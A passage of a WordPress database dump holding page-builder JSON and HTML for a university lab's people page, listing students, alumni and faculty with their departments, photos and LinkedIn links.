Gupta<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c234\",\"index\":2,\"id\":\"182-c237\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Master\'s Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c234\",\"index\":3,\"id\":\"182-c238\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/anshulgupta-panther\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c234\",\"index\":1,\"id\":\"182-c239\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"}],\"id\":\"182-c74\",\"parentId\":\"182-c73\",\"partialId\":182,\"styleRef\":847,\"type\":\"content\"}],\"id\":\"182-c73\",\"parentId\":\"182-c1\",\"partialId\":182,\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Graduates\"},\"id\":\"182-c148\",\"parentId\":\"182-c147\",\"partialId\":182,\"styleRef\":862,\"type\":\"content\"}],\"id\":\"182-c147\",\"parentId\":\"182-c146\",\"partialId\":182,\"styleRef\":861,\"type\":\"content\"}],\"id\":\"182-c146\",\"parentId\":\"182-c73\",\"partialId\":182,\"styleRef\":860,\"type\":\"content\"}]},\"styleRef\":846,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Undergrads\",\"attrs\":{\"id\":\"undergrads-2\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"182-c151\",\"parentId\":\"182-c150\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c151\",\"index\":0,\"id\":\"182-c152\",\"partialId\":182,\"styleRef\":831,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/10\\/cropped-cropped-IMG_9249-e1697207848252.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1765,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c151\",\"index\":0,\"id\":\"182-c153\",\"partialId\":182,\"styleRef\":832,\"type\":\"content\",\"props\":{\"content\":\"MD Raiyan Haque<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c151\",\"index\":2,\"id\":\"182-c154\",\"partialId\":182,\"styleRef\":833,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"\\t 4:40 PM       https:\\/\\/www.linkedin.com\\/in\\/mdraiyanhaque\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c151\",\"index\":1,\"id\":\"182-c155\",\"partialId\":182,\"styleRef\":835,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":830,\"type\":\"content\"}],\"id\":\"182-c150\",\"parentId\":\"182-c149\",\"partialId\":182,\"styleRef\":829,\"type\":\"content\"}],\"id\":\"182-c149\",\"parentId\":\"182-c1\",\"partialId\":182,\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Undergraduates\"},\"id\":\"182-c158\",\"parentId\":\"182-c157\",\"partialId\":182,\"styleRef\":844,\"type\":\"content\"}],\"id\":\"182-c157\",\"parentId\":\"182-c156\",\"partialId\":182,\"styleRef\":843,\"type\":\"content\"}],\"id\":\"182-c156\",\"parentId\":\"182-c149\",\"partialId\":182,\"styleRef\":842,\"type\":\"content\"}]},\"styleRef\":828,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Alumni\",\"attrs\":{\"id\":\"alumni\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"182-c161\",\"parentId\":\"182-c160\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c161\",\"index\":0,\"id\":\"182-c162\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-Sarah_Akinola-scaled-2-e1697208116294.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1772,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c161\",\"index\":0,\"id\":\"182-c163\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Sarah Akinola\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c161\",\"index\":2,\"id\":\"182-c164\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/akinola-sarah-035789138\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c161\",\"index\":1,\"id\":\"182-c165\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c166\",\"parentId\":\"182-c160\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c166\",\"index\":0,\"id\":\"182-c167\",\"partialId\":182,\"styleRef\":918,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-Anvith-e1697208489419.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1780,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c166\",\"index\":0,\"id\":\"182-c168\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Anvith Anand\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c166\",\"index\":2,\"id\":\"182-c169\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/anvith-anand\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c166\",\"index\":1,\"id\":\"182-c170\",\"partialId\":182,\"styleRef\":919,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c171\",\"parentId\":\"182-c160\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c171\",\"index\":0,\"id\":\"182-c172\",\"partialId\":182,\"styleRef\":920,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-Alex-e1697208598736.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1782,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c171\",\"index\":0,\"id\":\"182-c173\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Alex Asige\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c171\",\"index\":2,\"id\":\"182-c174\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/twitter\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/twitter.com\\/i\\/flow\\/login?redirect_after_login=%2FAsigeAlex\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882}]},\"parentId\":\"182-c171\",\"index\":1,\"id\":\"182-c175\",\"partialId\":182,\"styleRef\":921,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c176\",\"parentId\":\"182-c160\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c176\",\"index\":0,\"id\":\"182-c177\",\"partialId\":182,\"styleRef\":922,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-Bhavya-scaled-1-e1697208670956.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1784,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c176\",\"index\":0,\"id\":\"182-c178\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Bhavya Busireddy\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c176\",\"index\":2,\"id\":\"182-c179\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\\\">Computer Science<\\/span><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/bhavya-busireddy-b052b192\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c176\",\"index\":1,\"id\":\"182-c180\",\"partialId\":182,\"styleRef\":923,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c181\",\"parentId\":\"182-c160\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c181\",\"index\":0,\"id\":\"182-c182\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-Vineeth-e1697208720256.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1786,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c181\",\"index\":0,\"id\":\"182-c183\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Vineeth Kumar Chandha\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c181\",\"index\":2,\"id\":\"182-c184\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/vineeth-kumar-chandha-207611149\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c181\",\"index\":1,\"id\":\"182-c185\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c186\",\"parentId\":\"182-c160\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c186\",\"index\":0,\"id\":\"182-c187\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-cropped-cropped-sathwik-2-scaled-1-e1697208827396.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1788,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c186\",\"index\":0,\"id\":\"182-c188\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Sathwik Chowda\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c186\",\"index\":2,\"id\":\"182-c189\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\\\">Computer Science<\\/span><\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/sathwikchowda\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c186\",\"index\":1,\"id\":\"182-c190\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c191\",\"parentId\":\"182-c160\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c191\",\"index\":0,\"id\":\"182-c192\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-Brindal-e1697208968672.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1790,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c191\",\"index\":0,\"id\":\"182-c193\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Brindal Dhol\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c191\",\"index\":2,\"id\":\"182-c194\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/brindaldhol\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c191\",\"index\":1,\"id\":\"182-c195\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c196\",\"parentId\":\"182-c160\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c196\",\"index\":0,\"id\":\"182-c197\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-ruby_parcells-scaled-1-2-e1697209095569.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1792,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c196\",\"index\":0,\"id\":\"182-c198\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Ruby Parcells\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c196\",\"index\":2,\"id\":\"182-c199\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<br><\\/p>\"},\"domuuid\":\"182-c259\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c200\",\"parentId\":\"182-c160\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c200\",\"index\":0,\"id\":\"182-c201\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-Reshmanjali-1-e1697209179440.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1794,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c200\",\"index\":0,\"id\":\"182-c202\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Sai Reshmanjali\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c200\",\"index\":2,\"id\":\"182-c203\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\\\">Computer Science<\\/span><\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/reshmanjali-guntupalli\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c200\",\"index\":1,\"id\":\"182-c204\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c205\",\"parentId\":\"182-c160\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c205\",\"index\":0,\"id\":\"182-c206\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/10\\/cropped-cropped-cropped-Eliza-Schuh-e1697208271242.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1795,\"size\":\"\"},\"domuuid\":\"182-c161\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c205\",\"index\":0,\"id\":\"182-c207\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Eliza Schuh<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c205\",\"index\":2,\"id\":\"182-c208\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/search\\/results\\/all\\/?fetchDeterministicClustersOnly=true&heroEntityKey=urn%3Ali%3Afsd_profile%3AACoAACVdt3kBua3o83BdyteC4Ssk8shnCAvZZZc&keywords=eliza%20schuh&origin=RICH_QUERY_TYPEAHEAD_HISTORY&position=0&searchId=e7657352-5ea3-4501-b984-d21542771bc4&sid=WW)&spellCorrectionEnabled=true\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c205\",\"index\":1,\"id\":\"182-c209\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c210\",\"parentId\":\"182-c160\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c210\",\"index\":0,\"id\":\"182-c211\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-Bronson-e1697209357897.png\",\"caption\":{\"text\":\"\"},\"imageId\":1797,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c210\",\"index\":0,\"id\":\"182-c212\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Bronson Tharpe\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c210\",\"index\":2,\"id\":\"182-c213\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/bronson-tharpe-9b754a1ba\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c210\",\"index\":1,\"id\":\"182-c214\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c215\",\"parentId\":\"182-c160\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c215\",\"index\":0,\"id\":\"182-c216\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-Angelique-e1697207062254.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1757,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c215\",\"index\":0,\"id\":\"182-c217\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Angelique Willis<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c215\",\"index\":2,\"id\":\"182-c218\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/angelique-willis\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c215\",\"index\":1,\"id\":\"182-c219\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c220\",\"parentId\":\"182-c160\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c220\",\"index\":0,\"id\":\"182-c221\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-cropped-rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790-e1697207627160.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1763,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c220\",\"index\":0,\"id\":\"182-c222\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Joshua Quiroz\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c220\",\"index\":2,\"id\":\"182-c223\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/joshua-quiroz-315713215\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c220\",\"index\":1,\"id\":\"182-c224\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":912,\"type\":\"content\"}],\"id\":\"182-c160\",\"parentId\":\"182-c159\",\"partialId\":182,\"styleRef\":911,\"type\":\"content\"}],\"id\":\"182-c159\",\"parentId\":\"182-c1\",\"partialId\":182,\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Alumni\"},\"id\":\"182-c227\",\"parentId\":\"182-c226\",\"partialId\":182,\"styleRef\":926,\"type\":\"content\"}],\"id\":\"182-c226\",\"parentId\":\"182-c225\",\"partialId\":182,\"styleRef\":925,\"type\":\"content\"}],\"id\":\"182-c225\",\"parentId\":\"182-c159\",\"partialId\":182,\"styleRef\":924,\"type\":\"content\"}]},\"styleRef\":910,\"type\":\"content\"}],\"id\":\"182-c1\",\"partialId\":182,\"styleRef\":407,\"type\":\"content\"}','','','inherit','closed','closed','','562-revision-v1','','','2024-11-14 09:48:38','2024-11-14 14:48:38','',562,'https://gsudice.dataconn.net/?p=1877',0,'revision','',0),(1878,1,'2024-11-14 09:48:38','2024-11-14 14:48:38','<div data-colibri-id=\"182-c1\" class=\"style-407 style-local-182-c1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"182-c2\" id=\"faculty\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-970 style-local-182-c2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <div data-colibri-id=\"182-c70\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-984 style-local-182-c70 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-985-outer style-local-182-c71-outer\">\n            <div data-colibri-id=\"182-c71\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-985 style-local-182-c71 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c72\" class=\"h-global-transition-all h-heading style-986 style-local-182-c72 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-986 style-local-182-c72\">\n                    <!---->\n                    <!---->\n                    <h2 class=\"\">Faculty</h2>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"182-c3\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-971 style-local-182-c3 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c4-outer\">\n            <div data-colibri-id=\"182-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c4 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c5\" class=\"d-block style-973 style-local-182-c5 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-cropped-cropped-headshot-1-e1651208089645-2-e1697201737742.jpg\" class=\"wp-image-1697 style-973-image style-local-182-c5-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c5-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c6\" class=\"h-global-transition-all h-heading style-974 style-local-182-c6 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c6\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Chetan Tiwari</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c7\" class=\"h-text h-text-component style-975 style-local-182-c7 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Director</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c8\" class=\"h-text h-text-component style-976 style-local-182-c8 position-relative 